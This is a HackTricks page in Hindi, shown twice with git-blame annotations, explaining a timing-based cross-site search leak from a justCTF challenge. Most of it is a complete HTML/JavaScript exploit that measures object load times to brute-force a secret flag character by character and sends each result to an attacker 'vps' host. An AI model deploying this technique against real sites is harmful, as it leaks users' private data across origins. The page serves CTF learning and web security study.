hacktricks/pentesting-web/xs-search/performance.now-+-force-heavy-task.md

# performance.now + भारी कार्य को बल दें

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को।**

</details>

इस चुनौती में उपयोगकर्ता हजारों वर्ण भेज सकता था और यदि ध्वज में शामिल था, तो वर्ण बॉट को वापस भेज दिए जाते थे। इसलिए एक बड़ी मात्रा में वर्ण डालकर हमलावर यह माप सकता था कि क्या ध्वज भेजे गए स्ट्रिंग में शामिल था या नहीं।

{% hint style="warning" %}
शुरू में, मैंने ऑब्जेक्ट की चौड़ाई और ऊंचाई सेट नहीं की थी, लेकिन बाद में, मुझे यह पता चला कि यह महत्वपूर्ण है क्योंकि डिफ़ॉल्ट साइज लोड समय में अंतर करने के लिए बहुत छोटा होता है।
{% endhint %}
```html
<!DOCTYPE html>
<html>
<head>

</head>
<body>
<img src="https://deelay.me/30000/https://example.com">
<script>
fetch('https://deelay.me/30000/https://example.com')

function send(data) {
fetch('http://vps?data='+encodeURIComponent(data)).catch(err => 1)
}

function leak(char, callback) {
return new Promise(resolve => {
let ss = 'just_random_string'
let url = `http://baby-xsleak-ams3.web.jctf.pro/search/?search=${char}&msg=`+ss[Math.floor(Math.random()*ss.length)].repeat(1000000)
let start = performance.now()
let object = document.createElement('object');
object.width = '2000px'
object.height = '2000px'
object.data = url;
object.onload = () => {
object.remove()
let end = performance.now()
resolve(end - start)
}
object.onerror = () => console.log('Error event triggered');
document.body.appendChild(object);
})

}

send('start')

let charset = 'abcdefghijklmnopqrstuvwxyz_}'.split('')
let flag = 'justCTF{'

async function main() {
let found = 0
let notFound = 0
for(let i=0;i<3;i++) {
await leak('..')
}
for(let i=0; i<3; i++) {
found += await leak('justCTF')
}
for(let i=0; i<3; i++) {
notFound += await leak('NOT_FOUND123')
}

found /= 3
notFound /= 3

send('found flag:'+found)
send('not found flag:'+notFound)

let threshold = found - ((found - notFound)/2)
send('threshold:'+threshold)

if (notFound > found) {
return
}

// exploit
while(true) {
if (flag[flag.length - 1] === '}') {
break
}
for(let char of charset) {
let trying = flag + char
let time = 0
for(let i=0; i<3; i++) {
time += await leak(trying)
}
time/=3
send('char:'+trying+',time:'+time)
if (time >= threshold) {
flag += char
send(flag)
break
}
}
}
}

main()

</script>
</body>

</html>
```
<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को।**

</details>
Translated to Hindi 2023-11-06 08:38:02 +00:00			`# performance.now + भारी कार्य को बल दें`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00
			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			* क्या आप किसी साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की इच्छा है? [सदस्यता योजनाएं](https://github.com/sponsors/carlospolop) की जांच करें!
			`* खोजें [The PEASS Family](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [NFTs](https://opensea.io/collection/the-peass-family)`
			`* प्राप्त करें [आधिकारिक PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* शामिल हों [💬](https://emojipedia.org/speech-balloon/) [Discord समूह](https://discord.gg/hRep4RUj7f) या [टेलीग्राम समूह](https://t.me/peass) या फॉलो करें मुझे Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) को।`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00
			`</details>`

Translated to Hindi 2023-11-06 08:38:02 +00:00			इस चुनौती में उपयोगकर्ता हजारों वर्ण भेज सकता था और यदि ध्वज में शामिल था, तो वर्ण बॉट को वापस भेज दिए जाते थे। इसलिए एक बड़ी मात्रा में वर्ण डालकर हमलावर यह माप सकता था कि क्या ध्वज भेजे गए स्ट्रिंग में शामिल था या नहीं।
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00
			`{% hint style="warning" %}`
Translated to Hindi 2023-11-06 08:38:02 +00:00			`शुरू में, मैंने ऑब्जेक्ट की चौड़ाई और ऊंचाई सेट नहीं की थी, लेकिन बाद में, मुझे यह पता चला कि यह महत्वपूर्ण है क्योंकि डिफ़ॉल्ट साइज लोड समय में अंतर करने के लिए बहुत छोटा होता है।`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00			`{% endhint %}`
			```html
			`<!DOCTYPE html>`
			`<html>`
			`<head>`

			`</head>`
			`<body>`
Translated to Hindi 2023-11-06 08:38:02 +00:00			`<img src="https://deelay.me/30000/https://example.com">`
			`<script>`
			`fetch('https://deelay.me/30000/https://example.com')`

			`function send(data) {`
			`fetch('http://vps?data='+encodeURIComponent(data)).catch(err => 1)`
			`}`

			`function leak(char, callback) {`
			`return new Promise(resolve => {`
			`let ss = 'just_random_string'`
			let url = `http://baby-xsleak-ams3.web.jctf.pro/search/?search=${char}&msg=`+ss[Math.floor(Math.random()*ss.length)].repeat(1000000)
			`let start = performance.now()`
			`let object = document.createElement('object');`
			`object.width = '2000px'`
			`object.height = '2000px'`
			`object.data = url;`
			`object.onload = () => {`
			`object.remove()`
			`let end = performance.now()`
			`resolve(end - start)`
			`}`
			`object.onerror = () => console.log('Error event triggered');`
			`document.body.appendChild(object);`
			`})`

			`}`

			`send('start')`

			`let charset = 'abcdefghijklmnopqrstuvwxyz_}'.split('')`
			`let flag = 'justCTF{'`

			`async function main() {`
			`let found = 0`
			`let notFound = 0`
			`for(let i=0;i<3;i++) {`
			`await leak('..')`
			`}`
			`for(let i=0; i<3; i++) {`
			`found += await leak('justCTF')`
			`}`
			`for(let i=0; i<3; i++) {`
			`notFound += await leak('NOT_FOUND123')`
			`}`

			`found /= 3`
			`notFound /= 3`

			`send('found flag:'+found)`
			`send('not found flag:'+notFound)`

			`let threshold = found - ((found - notFound)/2)`
			`send('threshold:'+threshold)`

			`if (notFound > found) {`
			`return`
			`}`

			`// exploit`
			`while(true) {`
			`if (flag[flag.length - 1] === '}') {`
			`break`
			`}`
			`for(let char of charset) {`
			`let trying = flag + char`
			`let time = 0`
			`for(let i=0; i<3; i++) {`
			`time += await leak(trying)`
			`}`
			`time/=3`
			`send('char:'+trying+',time:'+time)`
			`if (time >= threshold) {`
			`flag += char`
			`send(flag)`
			`break`
			`}`
			`}`
			`}`
			`}`

			`main()`

			`</script>`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00			`</body>`

			`</html>`
			```
			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			* क्या आप किसी साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करना चाहिए? [सदस्यता योजनाएं](https://github.com/sponsors/carlospolop) की जांच करें!
			`* [The PEASS Family](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [NFT संग्रह](https://opensea.io/collection/the-peass-family)`
			`* [आधिकारिक PEASS & HackTricks swag](https://peass.creator-spring.com) प्राप्त करें`
			`* शामिल हों [💬](https://emojipedia.org/speech-balloon/) [Discord समूह](https://discord.gg/hRep4RUj7f) या [टेलीग्राम समूह](https://t.me/peass) या मुझे Twitter पर फ़ॉलो करें [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) को।`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00
			`</details>`